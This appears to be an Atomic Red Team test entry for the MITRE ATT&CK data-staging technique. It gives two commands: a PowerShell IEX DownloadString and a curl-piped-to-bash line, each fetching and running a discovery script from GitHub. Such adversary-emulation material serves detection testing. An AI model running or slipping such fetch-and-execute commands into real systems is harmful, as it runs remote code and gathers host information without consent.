Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.
Utilize powershell to download discovery.bat and save to a local file
Supported Platforms: Windows
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat') > pi.log
Utilize curl to download discovery.sh and execute a basic information gathering shell script
Supported Platforms: Linux, macOS
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log